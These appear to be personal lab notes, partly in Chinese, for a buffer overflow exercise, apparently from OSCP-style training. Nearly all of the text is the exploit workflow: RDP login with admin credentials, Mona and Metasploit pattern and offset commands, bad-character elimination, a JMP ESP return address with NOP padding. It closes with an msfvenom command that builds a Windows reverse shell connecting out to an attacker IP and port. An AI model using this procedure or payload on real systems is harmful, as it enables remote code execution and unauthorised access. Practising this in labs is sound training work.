xfreerdp /u:admin /p:password /cert:ignore /v:10.10.127.14 /workarea

!mona config -set workingfolder c:\mona\%p

最大探测数：2100

生成指定长度不重复字节：（比fuzzing探测出来的字节长一点）
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2300

EIP 70433570


找到offiset

!mona findmsp -distance 2300

!mona bytearray -b "\x00"

ESP 01AAFA30

!mona compare -f C:\mona\oscp\bytearray.bin -a 01AAFA30

POSSIBLY BAD CHARS: a9,aa,cd,ce,d4,d5


!mona bytearray -b "\x00\xa9\xcd\xd4"



ESP 0196FA30

!mona compare -f C:\mona\oscp\bytearray.bin -a 0196FA30


根据坏字节查找到可以利用的shellcode的静态地址
!mona jmp -r esp -cpb "\x00\xa9\xcd\xd4"


找到静态地址：625011AF

retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16


生成shellcode:
msfvenom -p windows/shell_reverse_tcp LHOST=10.17.9.218 LPORT=4444 EXITFUNC=thread -b "\x00\xa9\xcd\xd4" -f c